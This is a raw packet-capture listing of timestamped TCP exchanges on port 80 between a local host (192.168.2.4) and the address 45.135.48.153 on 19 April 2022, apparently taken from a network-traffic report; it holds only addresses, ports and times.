Apr 19, 2022 16:44:44.251682997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.251853943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251883984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251972914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251977921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.252083063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252152920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.252197981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252300978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252399921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252448082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.252531052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252576113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.252686024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252721071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.252962112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253007889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.253017902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253057003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.253155947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253184080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253225088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.253309965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253403902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253618956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253649950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253700018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.253741026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.253804922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253938913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253967047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.253993988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.254075050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254117012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.254251957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254437923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254467964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254489899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.254591942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254755020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254785061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.254805088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.254841089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.254915953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255117893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255146027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255191088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.255290985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255335093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.255429983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255557060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255584002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255633116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.255733013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255776882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.255873919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.255901098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256118059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256146908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256169081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.256201029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.256284952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256477118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256504059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256547928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.256647110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256690025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.256799936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.256829023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257038116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257066965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257086039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.257118940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.257240057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257266998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257442951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257491112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.257577896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257606983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257623911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.257742882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257914066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257942915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.257967949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.258008003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.258100986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258177042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258227110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.258316994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258514881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258543015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258599997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.258657932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258699894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.258744955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258939028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.258956909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259001017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.259217978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259236097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259263039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.259377956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259394884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259422064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.259617090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259637117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259676933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.259757996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259798050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.259944916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.259962082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260005951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.260184050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260200977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260404110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260445118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.260479927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260520935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.260550022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260612011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260653019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.260868073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.260885954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261097908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261116028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261143923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.261179924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.261225939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261457920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261475086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261507034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.261646986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261665106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261688948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.261893034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261909962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.261935949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.262095928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262114048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262140036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.262238026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262279034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.262422085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262440920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262480974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.262664080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262680054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262722015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.262902021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.262918949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263123035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263140917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263165951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.263206005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.263228893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263458967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263475895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263549089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.263586998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263820887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263839006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.263881922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.263933897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.264022112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264039993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264092922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.264262915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264280081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264329910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.264390945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264626980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264643908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264684916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.264823914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264841080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.264870882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265059948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265064001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265081882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265129089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265180111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265223980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265304089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265430927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265496969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265537977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265605927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265624046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265662909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.265862942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265880108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.265921116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.266064882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266082048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266231060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266388893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266413927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.266423941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266427994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.266501904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266551018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.266678095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266861916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266880035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.266910076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.267101049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267117977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267143965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.267340899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267358065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267384052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.267540932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267559052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267577887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.267780066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267797947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267834902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.267976046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.267992973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.268013954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.268114090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.268338919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.268357038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.268399000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.268430948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.268598080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.268912077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.269021988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.269076109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.269277096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.269325018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.269527912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.269859076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.269875050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270020962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.270076990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270226955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270241976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270273924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.270294905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.270354986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270431042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270464897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.270612955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270668983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270901918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270919085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.270948887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.270982027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.271039009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271224022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271240950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271285057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.271505117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271522045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271549940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.271609068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271769047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271786928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.271816015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.271848917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.272020102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272037029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272084951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.272222996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272239923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272294044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.272461891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272479057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272522926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.272581100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272823095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272840023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.272876978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273024082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273040056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273065090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273303986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273320913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273359060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273545027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273564100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273607016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273627043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273669004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273823977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273840904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.273883104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.273946047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274151087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274276018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274328947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274364948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.274401903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.274420977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274508953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274558067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.274655104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274815083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274873018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.274918079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.275074959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275091887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275120974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.275306940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275324106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275347948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.275501966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275516987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275543928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.275742054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275758028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275784016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.275983095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.275999069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276027918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.276221037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276237965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276262045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.276421070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276437044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276463985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.276652098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276669025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276694059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.276901960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276917934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.276948929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.277103901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277121067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277148962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.277231932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.277282953 CEST	49758	80	192.168.2.4	45.135.48.153
